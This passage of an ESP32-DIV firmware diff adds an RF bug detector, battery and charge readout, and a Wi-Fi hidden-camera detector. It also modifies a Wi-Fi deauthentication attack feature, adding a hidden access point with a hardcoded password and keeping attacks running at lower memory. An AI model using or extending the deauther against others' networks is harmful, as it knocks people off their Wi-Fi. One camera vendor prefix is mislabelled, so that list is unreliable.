+    318000000, 390000000, 418000000, 433075000, 433420000, 433920000,
+    434420000, 434775000, 438900000, 868350000, 915000000, 925000000
+};
+static const uint8_t kBugFreqCount = sizeof(kBugFreqList) / sizeof(kBugFreqList[0]);
+
+static constexpr int    kBugRssiThreshold   = -65;   // dBm — sustained signal
+static constexpr uint32_t kBugSustainMs     = 3000;  // >3 s above threshold = bug
+static constexpr uint32_t kBugSweepInterval = 2000;  // auto-sweep every 2 s
+static constexpr uint32_t kBugSettleMs      = 12;    // RX settle after SetRx
+static constexpr uint32_t kBugFlashInterval = 400;   // alert flash rate
+
+// Layout
+static constexpr int kBugTitleY     = 22;
+static constexpr int kBugBarTop     = 34;
+static constexpr int kBugBarH       = 8;
+static constexpr int kBugBarGap     = 2;
+static constexpr int kBugLabelY     = kBugBarTop + kBugBarH + 1;
+static constexpr int kBugListStartY = 34;
+static constexpr int kBugListRowH   = 14;
+
+static constexpr int kBugBarAreaX    = 4;
+static constexpr int kBugBarAreaW    = 232;
+static constexpr int kBugLabelWidth  = 52;
+static constexpr int kBugBarX        = kBugBarAreaX + kBugLabelWidth + 2;
+static constexpr int kBugBarMaxW     = kBugBarAreaW - kBugLabelWidth - 2 - 30; // leave room for dBm
+
+// --- State ------------------------------------------------------------------
+
+struct FreqState {
+  int      rssi;            // latest RSSI dBm
+  bool     aboveThreshold;  // currently above threshold this sweep
+  uint32_t aboveStartMs;    // when sustained signal began (0 = not active)
+  uint32_t sustainMs;       // accumulated sustained duration
+  bool     alerted;         // already alerted for this sustained event
+  int      peakRssi;        // peak RSSI during sustained event
+};
+
+static FreqState sFreq[kBugFreqCount];
+static uint32_t  sLastSweepMs   = 0;
+static uint8_t   sDisplayMode   = 0;   // 0 = bar graph, 1 = list
+static bool      sDisplayInvalid = true;
+static bool      sAlertActive    = false;
+static uint32_t  sFlashToggleMs  = 0;
+static bool      sFlashOn        = true;
+
+// Track which freqs are in alert to show on screen
+static uint8_t   sAlertFreqIdx    = 0;
+static bool      sAnyAlert        = false;
+
+// Button edge tracking
+static bool sPrevLeft = false, sPrevUp = false, sPrevDown = false;
+
+// --- Helpers ----------------------------------------------------------------
+
+static int bugContentBottom() {
+  return featureHasTouchNavBar() ? touchNavContentBottomY() : 320;
+}
+
+static void bugClearContent(uint16_t color = TFT_BLACK) {
+  if (featureHasTouchNavBar()) {
+    featureClearContent(color);
+  } else {
+    tft.fillScreen(color);
+  }
+}
+
+static void bugInitCC1101() {
+  ELECHOUSE_cc1101.setSpiPin(CC1101_SCK, CC1101_MISO, CC1101_MOSI, CC1101_CS);
+  ELECHOUSE_cc1101.setGDO(CC1101_GDO0, CC1101_GDO2);
+  ELECHOUSE_cc1101.Init();
+  ELECHOUSE_cc1101.setModulation(2);
+  ELECHOUSE_cc1101.setRxBW(650.0);
+}
+
+static void bugTuneRx(uint32_t freqHz) {
+  ELECHOUSE_cc1101.setMHZ(freqHz / 1000000.0);
+  ELECHOUSE_cc1101.SetRx();
+  delay(kBugSettleMs);
+}
+
+static int bugReadRssi() {
+  // ELECHOUSE_cc1101.getRssi() returns dBm (negative, e.g. -90 quiet, -40 strong).
+  // Some library versions may not have it; fall back to GDO0 carrier detect.
+  int rssi = ELECHOUSE_cc1101.getRssi();
+  if (rssi == 0 || rssi < -130) {
+    // Fallback: GDO0 high means carrier/signal present — approximate as threshold
+    rssi = digitalRead(CC1101_GDO0) ? (kBugRssiThreshold + 5) : (kBugRssiThreshold - 20);
+  }
+  return rssi;
+}
+
+static String bugFreqLabel(uint32_t freqHz) {
+  float mhz = freqHz / 1000000.0f;
+  char buf[12];
+  if (mhz >= 800.0f) {
+    snprintf(buf, sizeof(buf), "%.0f", mhz);
+  } else {
+    snprintf(buf, sizeof(buf), "%.2f", mhz);
+  }
+  return String(buf) + "M";
+}
+
+// --- SD Logging -------------------------------------------------------------
+
+static void bugLogAlert(uint8_t idx, int rssi, uint32_t durationMs) {
+  restoreSdAfterSharedSpi();
+  if (!isSDCardAvailable()) return;
+
+  if (!SD.exists(LOG_DIR)) {
+    SD.mkdir(LOG_DIR);
+  }
+
+  File f = SD.open(LOG_DIR "/bugdetect.csv", FILE_APPEND);
+  if (!f) return;
+
+  uint32_t now = millis();
+  char freqBuf[16];
+  snprintf(freqBuf, sizeof(freqBuf), "%lu", (unsigned long)kBugFreqList[idx]);
+
+  f.printf("%lu,%s,%d,%lu\n",
+           (unsigned long)now,
+           freqBuf,
+           rssi,
+           (unsigned long)durationMs);
+  f.close();
+}
+
+// --- Sweep ------------------------------------------------------------------
+
+static void bugPerformSweep() {
+  reclaimSharedSpiBus();
+
+#if defined(SD_CS)
+  pinMode(SD_CS, OUTPUT);
+  digitalWrite(SD_CS, HIGH);
+#endif
+#if defined(CC1101_CS)
+  pinMode(CC1101_CS, OUTPUT);
+  digitalWrite(CC1101_CS, HIGH);
+#endif
+
+  bugInitCC1101();
+
+  sAnyAlert = false;
+
+  for (uint8_t i = 0; i < kBugFreqCount; i++) {
+    bugTuneRx(kBugFreqList[i]);
+
+    // Sample RSSI a couple times for stability
+    int rssi1 = bugReadRssi();
+    delay(3);
+    int rssi2 = bugReadRssi();
+    int rssi = (rssi1 + rssi2) / 2;
+
+    FreqState &fs = sFreq[i];
+    fs.rssi = rssi;
+
+    uint32_t now = millis();
+    bool above = (rssi >= kBugRssiThreshold);
+
+    if (above) {
+      if (!fs.aboveThreshold) {
+        // First detection this session
+        fs.aboveThreshold = true;
+        fs.aboveStartMs   = now;
+        fs.sustainMs      = 0;
+        fs.peakRssi       = rssi;
+        fs.alerted        = false;
+      } else {
+        // Accumulate sustained time
+        fs.sustainMs = now - fs.aboveStartMs;
+        if (rssi > fs.peakRssi) fs.peakRssi = rssi;
+      }
+
+      // Check for alert threshold (>3 seconds sustained)
+      if (fs.sustainMs >= kBugSustainMs && !fs.alerted) {
+        fs.alerted  = true;
+        sAlertActive = true;
+        sAnyAlert    = true;
+        sAlertFreqIdx = i;
+        sFlashOn      = true;
+        sFlashToggleMs = now;
+
+        // Log to SD
+        bugLogAlert(i, fs.peakRssi, fs.sustainMs);
+      }
+
+      if (fs.alerted) {
+        sAnyAlert = true;
+      }
+    } else {
+      // Signal dropped below threshold — reset sustained tracking
+      fs.aboveThreshold = false;
+      fs.aboveStartMs   = 0;
+      fs.sustainMs      = 0;
+      fs.alerted        = false;
+    }
+  }
+
+  // Return CC1101 to idle-ish RX to reduce power
+  ELECHOUSE_cc1101.SetRx();
+}
+
+// --- Display: Bar Graph -----------------------------------------------------
+
+static void bugDrawBarGraph() {
+  int bottomY = bugContentBottom();
+  int maxBars = (bottomY - kBugBarTop) / (kBugBarH + kBugBarGap);
+  if (maxBars < 1) maxBars = 1;
+  uint8_t showCount = (kBugFreqCount < maxBars) ? kBugFreqCount : maxBars;
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  for (uint8_t i = 0; i < showCount; i++) {
+    FreqState &fs = sFreq[i];
+    int y = kBugBarTop + i * (kBugBarH + kBugBarGap);
+
+    // Clear row
+    tft.fillRect(kBugBarAreaX, y, kBugBarAreaW, kBugBarH, TFT_BLACK);
+
+    // Frequency label
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.setCursor(kBugBarAreaX, y);
+    tft.print(bugFreqLabel(kBugFreqList[i]));
+
+    // Bar: map RSSI from [-100, -30] to [0, kBugBarMaxW]
+    int rssiClamped = fs.rssi;
+    if (rssiClamped < -100) rssiClamped = -100;
+    if (rssiClamped > -30)  rssiClamped = -30;
+    int barW = (int)((long)(rssiClamped + 100) * kBugBarMaxW / 70);
+    if (barW < 0) barW = 0;
+
+    uint16_t barColor;
+    if (fs.alerted) {
+      barColor = TFT_RED;
+    } else if (fs.aboveThreshold) {
+      barColor = TFT_YELLOW;
+    } else {
+      barColor = TFT_GREEN;
+    }
+
+    if (barW > 0) {
+      tft.fillRect(kBugBarX, y, barW, kBugBarH, barColor);
+    }
+
+    // dBm text after bar
+    tft.setTextColor(UI_LABLE, TFT_BLACK);
+    tft.setCursor(kBugBarX + kBugBarMaxW + 2, y);
+    tft.print(fs.rssi);
+  }
+
+  // Show count if truncated
+  if (showCount < kBugFreqCount) {
+    int y = kBugBarTop + showCount * (kBugBarH + kBugBarGap);
+    tft.setTextColor(UI_LABLE, TFT_BLACK);
+    tft.setCursor(kBugBarAreaX, y);
+    tft.printf("+%d more", kBugFreqCount - showCount);
+  }
+}
+
+// --- Display: List Mode -----------------------------------------------------
+
+static void bugDrawList() {
+  int bottomY = bugContentBottom();
+  int maxRows = (bottomY - kBugListStartY) / kBugListRowH;
+  if (maxRows < 1) maxRows = 1;
+  uint8_t showCount = (kBugFreqCount < maxRows) ? kBugFreqCount : maxRows;
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  for (uint8_t i = 0; i < showCount; i++) {
+    FreqState &fs = sFreq[i];
+    int y = kBugListStartY + i * kBugListRowH;
+
+    // Clear row
+    tft.fillRect(0, y, 240, kBugListRowH - 1, TFT_BLACK);
+
+    uint16_t color;
+    const char* tag;
+    if (fs.alerted) {
+      color = TFT_RED;
+      tag   = "BUG";
+    } else if (fs.aboveThreshold) {
+      color = TFT_YELLOW;
+      tag   = "SIG";
+    } else {
+      color = UI_TEXT;
+      tag   = "   ";
+    }
+
+    tft.setTextColor(color, TFT_BLACK);
+    tft.setCursor(2, y);
+    tft.printf("%s %-7s %4ddBm",
+               tag,
+               bugFreqLabel(kBugFreqList[i]).c_str(),
+               fs.rssi);
+
+    if (fs.aboveThreshold && fs.sustainMs > 0) {
+      tft.setTextColor(TFT_CYAN, TFT_BLACK);
+      tft.setCursor(150, y);
+      tft.printf("%lus", (unsigned long)(fs.sustainMs / 1000));
+    }
+  }
+}
+
+// --- Display: Alert Overlay -------------------------------------------------
+
+static void bugDrawAlertOverlay() {
+  if (!sAlertActive) return;
+
+  uint32_t now = millis();
+  if (now - sFlashToggleMs >= kBugFlashInterval) {
+    sFlashOn = !sFlashOn;
+    sFlashToggleMs = now;
+  }
+
+  // Draw alert box in center of content area
+  int boxW = 200;
+  int boxH = 50;
+  int boxX = (240 - boxW) / 2;
+  int boxY = kBugBarTop + 30;
+
+  uint16_t bgColor = sFlashOn ? TFT_RED : TFT_BLACK;
+  uint16_t fgColor = sFlashOn ? TFT_WHITE : TFT_RED;
+
+  tft.fillRoundRect(boxX, boxY, boxW, boxH, 4, bgColor);
+  tft.drawRoundRect(boxX, boxY, boxW, boxH, 4, TFT_RED);
+
+  tft.setTextFont(2);
+  tft.setTextSize(1);
+  tft.setTextColor(fgColor, bgColor);
+  tft.setCursor(boxX + 16, boxY + 4);
+  tft.print("BUG DETECTED!");
+
+  tft.setTextFont(1);
+  tft.setTextColor(fgColor, bgColor);
+  tft.setCursor(boxX + 16, boxY + 28);
+  char freqStr[20];
+  snprintf(freqStr, sizeof(freqStr), "Freq: %lu MHz",
+           (unsigned long)(kBugFreqList[sAlertFreqIdx] / 1000000));
+  tft.print(freqStr);
+  tft.printf(" %ddBm", sFreq[sAlertFreqIdx].peakRssi);
+}
+
+// --- Full Display Refresh ---------------------------------------------------
+
+static void bugDrawDisplay() {
+  if (sDisplayInvalid) {
+    bugClearContent(TFT_BLACK);
+    sDisplayInvalid = false;
+  }
+
+  // Title
+  tft.fillRect(0, 19, 240, 14, TFT_BLACK);
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+  tft.setTextColor(UI_LABLE, TFT_BLACK);
+  tft.setCursor(2, kBugTitleY);
+  if (sDisplayMode == 0) {
+    tft.print("RF BUG DETECTOR - Bars");
+  } else {
+    tft.print("RF BUG DETECTOR - List");
+  }
+
+  // Sweep status on right
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(170, kBugTitleY);
+  if (sAnyAlert) {
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.print("ALERT!");
+  } else {
+    tft.setTextColor(TFT_GREEN, TFT_BLACK);
+    tft.print("CLEAR");
+  }
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  if (sDisplayMode == 0) {
+    bugDrawBarGraph();
+  } else {
+    bugDrawList();
+  }
+
+  // Alert overlay on top
+  bugDrawAlertOverlay();
+}
+
+// --- Setup ------------------------------------------------------------------
+
+void bugDetectorSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+
+  setTouchNavLabels("Rescan", "", "Exit", "", "");
+
+  bugClearContent(TFT_BLACK);
+  tft.setRotation(TFT_ROTATION);
+
+  drawStatusBar(readBatteryVoltage(), true);
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_SELECT, INPUT_PULLUP);
+#endif
+
+  setupTouchscreen();
+
+  // Initialize state
+  for (uint8_t i = 0; i < kBugFreqCount; i++) {
+    sFreq[i].rssi           = -100;
+    sFreq[i].aboveThreshold = false;
+    sFreq[i].aboveStartMs   = 0;
+    sFreq[i].sustainMs      = 0;
+    sFreq[i].alerted        = false;
+    sFreq[i].peakRssi       = -100;
+  }
+
+  sLastSweepMs    = 0;
+  sDisplayMode    = 0;
+  sDisplayInvalid = true;
+  sAlertActive    = false;
+  sAnyAlert       = false;
+  sFlashOn        = true;
+  sFlashToggleMs  = 0;
+  sPrevLeft       = false;
+  sPrevUp         = false;
+  sPrevDown       = false;
+
+  // Initial sweep immediately
+  bugPerformSweep();
+  sLastSweepMs = millis();
+
+  sDisplayInvalid = true;
+  bugDrawDisplay();
+  redrawTouchButtonBar();
+}
+
+// --- Loop -------------------------------------------------------------------
+
+void bugDetectorLoop() {
+  // Exit check
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    feature_exit_requested = true;
+    return;
+  }
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  updateStatusBar();
+  drawStatusBar(readBatteryVoltage(), true);
+
+  maintainTouchNavBar();
+
+  // --- Button handling ---
+  // BTN_LEFT = rescan
+  bool leftPressed = isButtonPressed(BTN_LEFT);
+  if (leftPressed && !sPrevLeft) {
+    // Force immediate rescan
+    bugPerformSweep();
+    sLastSweepMs = millis();
+    sDisplayInvalid = true;
+    delay(150);
+  }
+  sPrevLeft = leftPressed;
+
+  // Touch nav left = rescan
+  if (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_LEFT)) {
+    bugPerformSweep();
+    sLastSweepMs = millis();
+    sDisplayInvalid = true;
+  }
+
+  // BTN_UP/DOWN = cycle display mode
+  bool upPressed = isButtonPressed(BTN_UP);
+  if (upPressed && !sPrevUp) {
+    sDisplayMode = (sDisplayMode + 1) % 2;
+    sDisplayInvalid = true;
+    delay(150);
+  }
+  sPrevUp = upPressed;
+
+  bool downPressed = isButtonPressed(BTN_DOWN);
+  if (downPressed && !sPrevDown) {
+    sDisplayMode = (sDisplayMode == 0) ? 1 : 0;
+    sDisplayInvalid = true;
+    delay(150);
+  }
+  sPrevDown = downPressed;
+
+  // Touch nav up/down also cycle mode
+  if (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_UP)) {
+    sDisplayMode = (sDisplayMode + 1) % 2;
+    sDisplayInvalid = true;
+  }
+  if (featureHasTouchNavBar() && isTouchNavButtonPressedEdge(BTN_DOWN)) {
+    sDisplayMode = (sDisplayMode == 0) ? 1 : 0;
+    sDisplayInvalid = true;
+  }
+
+  // --- Auto-sweep every 2 seconds ---
+  uint32_t now = millis();
+  if ((now - sLastSweepMs) >= kBugSweepInterval) {
+    bugPerformSweep();
+    sLastSweepMs = now;
+  }
+
+  // --- Draw ---
+  bugDrawDisplay();
+
+  // Small delay to prevent excessive refresh
+  delay(30);
+}
+
+}  // namespace BugDetector

--- a/ESP32-DIV/utils.cpp
+++ b/ESP32-DIV/utils.cpp
@@ -473,28 +473,46 @@ void requestStatusBarRedraw() {
 const float R1 = 100000.0;
 const float R2 = 100000.0;
 
+// IP5306 power management IC — battery percentage via I2C (ESP32-DIV v2).
+// The IP5306 drives 4 LEDs, so levels are in 25% increments only.
+// Returns -1 if the IC does not respond (I2C not ready / not present).
+int readIpBatteryPercent() {
+  Wire.beginTransmission(0x75);
+  Wire.write(0x78);
+  if (Wire.endTransmission(false) != 0) return -1;
+  if (Wire.requestFrom((int)0x75, 1) != 1) return -1;
+  switch (Wire.read() & 0xF0) {
+    case 0x00: return 100;
+    case 0x80: return 75;
+    case 0xC0: return 50;
+    case 0xE0: return 25;
+    default:   return 5;
+  }
+}
+
+// IP5306 charging status via I2C.
+// Register 0x70 bit3 = charging active, Register 0x71 bit3 = battery full.
+// Returns: 0 = not charging, 1 = charging, 2 = full, -1 = I2C error.
+int readIpChargeStatus() {
+  Wire.beginTransmission(0x75);
+  Wire.write(0x71);
+  if (Wire.endTransmission(false) != 0) return -1;
+  if (Wire.requestFrom((int)0x75, 1) != 1) return -1;
+  if (Wire.read() & (1 << 3)) return 2;  // full
+
+  Wire.beginTransmission(0x75);
+  Wire.write(0x70);
+  if (Wire.endTransmission(false) != 0) return -1;
+  if (Wire.requestFrom((int)0x75, 1) != 1) return -1;
+  if (Wire.read() & (1 << 3)) return 1;  // charging
+  return 0;  // not charging
+}
+
 float readBatteryVoltage()
 {
-  static bool adcInitialized = false;
-
-  if (!adcInitialized)
-  {
-    analogSetPinAttenuation(BATTERY_ADC_PIN, ADC_11db);
-    adcInitialized = true;
-  }
-
-  const int sampleCount = 16;
-  uint32_t sum = 0;
-
-  for (int i = 0; i < sampleCount; i++)
-  {
-    sum += analogReadMilliVolts(BATTERY_ADC_PIN);
-    delayMicroseconds(500);
-  }
-
-  float avgMv = sum / (float)sampleCount;
-
-  return (avgMv / 1000.0f) * 2.0f;
+  int pct = readIpBatteryPercent();
+  if (pct < 0) return 0.0f;
+  return 3.0f + (pct / 100.0f) * 1.2f;
 }
 
 float readInternalTemperature() {
@@ -548,6 +566,7 @@ void drawStatusBar(float batteryVoltage, bool forceUpdate, bool bottomSeparator)
   static int lastSdSnap            = -1;
   static bool lastWardGpsIcon      = false;
   static uint32_t lastWardBlinkPhase = 0;
+  static int lastChargeStatus      = -1;
 
   int batteryPercentage = ::map(batteryVoltage * 100, 300, 420, 0, 100);
   batteryPercentage = constrain(batteryPercentage, 0, 100);
@@ -573,9 +592,11 @@ void drawStatusBar(float batteryVoltage, bool forceUpdate, bool bottomSeparator)
 
   const bool battCh =
       statusBarBatteryMeaningfulChange(batteryPercentage, lastBatteryPercentage, forceUpdate);
+  const int chargeStatus = readIpChargeStatus();
+  const bool chargeChanged = (chargeStatus != lastChargeStatus);
   const bool wardBlinkOnly =
       !forceUpdate && wardGpsIcon && lastWardGpsIcon &&
-      (wardBlinkPhase != lastWardBlinkPhase) && !battCh && wifiHalf == lastWifiHalf &&
+      (wardBlinkPhase != lastWardBlinkPhase) && !battCh && !chargeChanged && wifiHalf == lastWifiHalf &&
       bleHalf == lastBleHalf && tempBand == lastTempBand && sdSnap == lastSdSnap;
 
   if (wardBlinkOnly) {
@@ -599,7 +620,7 @@ void drawStatusBar(float batteryVoltage, bool forceUpdate, bool bottomSeparator)
     return;
   }
 
-  if (battCh || wifiHalf != lastWifiHalf || bleHalf != lastBleHalf || tempBand != lastTempBand ||
+  if (battCh || chargeChanged || wifiHalf != lastWifiHalf || bleHalf != lastBleHalf || tempBand != lastTempBand ||
       sdSnap != lastSdSnap || wardGpsIcon != lastWardGpsIcon ||
       (wardGpsIcon && wardBlinkPhase != lastWardBlinkPhase) || forceUpdate) {
     int barHeight = 20;
@@ -620,6 +641,16 @@ void drawStatusBar(float batteryVoltage, bool forceUpdate, bool bottomSeparator)
     tft.setTextFont(1);
     tft.setTextSize(1);
     tft.print(String(batteryPercentage) + "%");
+
+    // Charging indicator — read IP5306 charge status and show +/FULL
+    int chargeStatus = readIpChargeStatus();
+    if (chargeStatus == 1) {
+      tft.setTextColor(TFT_YELLOW, UI_LABLE);
+      tft.print("+");
+    } else if (chargeStatus == 2) {
+      tft.setTextColor(TFT_CYAN, UI_LABLE);
+      tft.print(" FULL");
+    }
 
     const int iconW         = 16;
     const int gap           = 3;
@@ -693,6 +724,7 @@ void drawStatusBar(float batteryVoltage, bool forceUpdate, bool bottomSeparator)
     lastSdSnap            = sdSnap;
     lastWardGpsIcon       = wardGpsIcon;
     lastWardBlinkPhase    = wardGpsIcon ? wardBlinkPhase : 0u;
+    lastChargeStatus      = chargeStatus;
   }
 }
 

--- a/ESP32-DIV/wifi.cpp
+++ b/ESP32-DIV/wifi.cpp
@@ -4457,15 +4457,34 @@ bool checkApChannel(const uint8_t *bssid, uint8_t *channel) {
     return false;
 }
 
+// Deauther's resetWifi - restarts WiFi and re-configures AP mode
 void resetWifi() {
     esp_wifi_stop();
     delay(200);
     esp_wifi_start();
     delay(200);
+
+    // Re-configure AP mode after restart
+    WiFi.mode(WIFI_AP);
+    delay(100);
+
+    wifi_config_t ap_config = {0};
+    strncpy((char*)ap_config.ap.ssid, "ESP32-DIV", sizeof(ap_config.ap.ssid));
+    ap_config.ap.ssid_len = strlen("ESP32-DIV");
+    strncpy((char*)ap_config.ap.password, "deauth123", sizeof(ap_config.ap.password));
+    ap_config.ap.authmode = WIFI_AUTH_WPA2_PSK;
+    ap_config.ap.ssid_hidden = 1;
+    ap_config.ap.max_connection = 4;
+    ap_config.ap.beacon_interval = 100;
+    ap_config.ap.channel = selectedChannel;
+    esp_wifi_set_config(WIFI_IF_AP, &ap_config);
+    delay(50);
+
     packet_count = 0;
     success_count = 0;
     consecutive_failures = 0;
 }
+
 
 void drawAttackScreen() {
     tft.drawFastHLine(0, 19, 240, UI_LINE);
@@ -4532,6 +4551,29 @@ static void deautherHandleNavButtons() {
 
     if (selected_ap_index >= 0) {
         if (isButtonPressedEdge(BTN_LEFT)) {
+            if (!attack_running) {
+                // Starting attack — switch to AP mode on target channel
+                WiFi.mode(WIFI_AP);
+                delay(100);
+                
+                wifi_config_t ap_config = {0};
+                strncpy((char*)ap_config.ap.ssid, "ESP32-DIV", sizeof(ap_config.ap.ssid));
+                ap_config.ap.ssid_len = strlen("ESP32-DIV");
+                strncpy((char*)ap_config.ap.password, "deauth123", sizeof(ap_config.ap.password));
+                ap_config.ap.authmode = WIFI_AUTH_WPA2_PSK;
+                ap_config.ap.ssid_hidden = 1;
+                ap_config.ap.max_connection = 4;
+                ap_config.ap.beacon_interval = 100;
+                ap_config.ap.channel = selectedChannel;
+                esp_wifi_set_config(WIFI_IF_AP, &ap_config);
+                delay(50);
+                
+                // Reset counters
+                packet_count = 0;
+                success_count = 0;
+                consecutive_failures = 0;
+                last_packet_time = 0;
+            }
             attack_running = !attack_running;
             if (!attack_running) {
                 last_packet_time = 0;
@@ -4804,7 +4846,7 @@ void deautherLoop() {
     uint32_t current_time = millis();
     if (attack_running && selected_ap_index != -1) {
         uint32_t heap = ESP.getFreeHeap();
-        if (heap < 80000) {
+        if (heap < 40000) {
             attack_running = false;
             last_packet_time = 0;
             drawAttackScreen();
@@ -10666,4 +10708,1402 @@ void updateLoop() {
     delay(200);
   }
 }
+}  // namespace FirmwareUpdate
+
+// ══════════════════════════════════════════════════════════════════
+// Hidden Camera Detector
+// Scans WiFi for devices matching known camera/IoT OUI prefixes and
+// suspicious SSID patterns. Alerts via on-screen highlight.
+// ══════════════════════════════════════════════════════════════════
+namespace CameraDetector {
+
+#undef TFT_BLACK
+#define TFT_BLACK FEATURE_BG
+#undef TFT_WHITE
+#define TFT_WHITE FEATURE_TEXT
+
+struct CamMatch {
+  char ssid[33];
+  uint8_t bssid[6];
+  int rssi;
+  int channel;
+  uint8_t authmode;
+  bool isCameraOUI;
+  bool isSuspiciousSSID;
+  bool isHiddenSSID;
+  const char* vendor;
+  const char* ssidMatch;
+};
+
+// Known camera/IoT vendor OUI prefixes (first 3 octets of MAC).
+static const uint8_t kCameraOUIs[][3] = {
+  {0x90, 0x02, 0xA9},  // Hikvision
+  {0xC0, 0x56, 0x27},  // Hikvision
+  {0x28, 0x57, 0x2E},  // Hikvision
+  {0x18, 0x68, 0xCB},  // Dahua
+  {0x3C, 0xEF, 0x8C},  // Dahua
+  {0xA0, 0xBD, 0x1D},  // Dahua
+  {0x10, 0x14, 0x06},  // Dahua
+  {0x9C, 0x14, 0x6A},  // Dahua
+  {0xCC, 0x61, 0xE1},  // Dahua
+  {0xB0, 0xA7, 0xB9},  // Reolink
+  {0xEC, 0x71, 0xDB},  // Reolink
+  {0x08, 0x00, 0x36},  // Reolink
+  {0x00, 0x1A, 0x11},  // Axis Communications
+  {0xAC, 0xCC, 0x8A},  // Axis Communications
+  {0x00, 0x40, 0x8C},  // Axis Communications
+  {0x00, 0x0C, 0x29},  // Foscam
+  {0x90, 0x1B, 0x6E},  // Amcrest
+  {0x18, 0xD6, 0xC7},  // Wyze
+  {0x00, 0x12, 0x14},  // Bosch Security
+  {0xB8, 0x27, 0xEB},  // Raspberry Pi
+  {0xDC, 0xA6, 0x32},  // Raspberry Pi
+  {0xE4, 0x5F, 0x01},  // Raspberry Pi
+};
+
+static const char* kCameraVendors[] = {
+  "Hikvision", "Hikvision", "Hikvision",
+  "Dahua", "Dahua", "Dahua", "Dahua", "Dahua", "Dahua",
+  "Reolink", "Reolink", "Reolink",
+  "Axis", "Axis", "Axis",
+  "Foscam", "Amcrest", "Wyze",
+  "Bosch Security",
+  "Raspberry Pi", "Raspberry Pi", "Raspberry Pi",
+};
+
+static const int kNumCameraOUIs = sizeof(kCameraOUIs) / sizeof(kCameraOUIs[0]);
+
+// Tightened SSID keywords — only specific camera product prefixes, not generic terms.
+struct SsidPattern {
+  const char* pattern;
+  const char* label;
+};
+
+static const SsidPattern kSuspiciousSSIDs[] = {
+  {"IPCAM",      "IP Camera"},
+  {"IP-CAM",     "IP Camera"},
+  {"IPC-",       "IP Camera"},
+  {"IPC_",       "IP Camera"},
+  {"HIKVISION",  "Hikvision"},
+  {"HIK-",       "Hikvision"},
+  {"DS-2",       "Hikvision Cam"},
+  {"DAHUA",      "Dahua"},
+  {"DH-",        "Dahua Cam"},
+  {"REOLINK",    "Reolink"},
+  {"RLK-",       "Reolink"},
+  {"AMCREST",    "Amcrest"},
+  {"IP2M-",      "Amcrest Cam"},
+  {"FOSCAM",     "Foscam"},
+  {"FI-",        "Foscam Cam"},
+  {"WYZECAM",    "Wyze Cam"},
+  {"YIHOME",     "YI Camera"},
+  {"YI-",        "YI Camera"},
+  {"ARLO",       "Arlo Cam"},
+  {"RING-",      "Ring Cam"},
+  {"BOSCH",      "Bosch Security"},
+  {"AXIS-",      "Axis Cam"},
+  {"HiddenCam",  "Hidden Cam"},
+};
+static const int kNumSuspiciousSSIDs = sizeof(kSuspiciousSSIDs) / sizeof(kSuspiciousSSIDs[0]);
+
+static CamMatch s_matches[ESP32DIV_MAX_WIFI_NETWORKS];
+static int s_matchCount = 0;
+static int s_totalScanned = 0;
+static bool s_scanning = false;
+static int s_selIdx = 0;
+static int s_listPage = 0;
+static bool s_inDetailView = false;
+static int s_detailIdx = 0;
+
+// Display layout
+static constexpr int kHeaderY = 22;
+static constexpr int kRowH = 24;
+static constexpr int kLabelH = 14;
+
+static int camContentBottom() {
+  return featureHasTouchNavBar() ? touchNavContentBottomY() : 320;
 }
+
+static int camRowsPerPage() {
+  const int avail = camContentBottom() - kHeaderY - kLabelH - 10;
+  return max(1, avail / kRowH);
+}
+
+static const char* matchOUI(const uint8_t bssid[6], bool& isCameraOUI) {
+  for (int i = 0; i < kNumCameraOUIs; i++) {
+    if (bssid[0] == kCameraOUIs[i][0] &&
+        bssid[1] == kCameraOUIs[i][1] &&
+        bssid[2] == kCameraOUIs[i][2]) {
+      isCameraOUI = true;
+      return kCameraVendors[i];
+    }
+  }
+  isCameraOUI = false;
+  return nullptr;
+}
+
+static const char* matchSSID(const char* ssid, bool& matched) {
+  if (!ssid || ssid[0] == '\0') { matched = false; return nullptr; }
+  String upper = String(ssid);
+  upper.toUpperCase();
+  for (int i = 0; i < kNumSuspiciousSSIDs; i++) {
+    if (upper.indexOf(kSuspiciousSSIDs[i].pattern) >= 0) {
+      matched = true;
+      return kSuspiciousSSIDs[i].label;
+    }
+  }
+  matched = false;
+  return nullptr;
+}
+
+static void performScan() {
+  s_scanning = true;
+  featureClearContent(TFT_BLACK);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setTextFont(2);
+  tft.setTextSize(1);
+  tft.setCursor(20, 80);
+  tft.print("Scanning WiFi...");
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  int n = WifiScan::staWifiScanSync();
+  s_totalScanned = n;
+  s_matchCount = 0;
+  s_selIdx = 0;
+  s_listPage = 0;
+
+  if (n <= 0) {
+    s_scanning = false;
+    return;
+  }
+
+  for (int i = 0; i < n && s_matchCount < ESP32DIV_MAX_WIFI_NETWORKS; i++) {
+    String ssidStr = WiFi.SSID(i);
+    uint8_t bssid[6];
+    memcpy(bssid, WiFi.BSSID(i), 6);
+
+    bool isCameraOUI = false;
+    const char* vendor = matchOUI(bssid, isCameraOUI);
+    bool ssidMatched = false;
+    const char* ssidLabel = matchSSID(ssidStr.c_str(), ssidMatched);
+    bool isHidden = (ssidStr.length() == 0);
+
+    // Only flag if: OUI match (camera hardware) OR SSID keyword match
+    // Hidden SSIDs alone are NOT flagged (too many legitimate hidden networks)
+    // But hidden SSID + camera OUI = high confidence
+    if (isCameraOUI || ssidMatched) {
+      CamMatch& m = s_matches[s_matchCount];
+      strncpy(m.ssid, ssidStr.c_str(), 32);
+      m.ssid[32] = '\0';
+      memcpy(m.bssid, bssid, 6);
+      m.rssi = WiFi.RSSI(i);
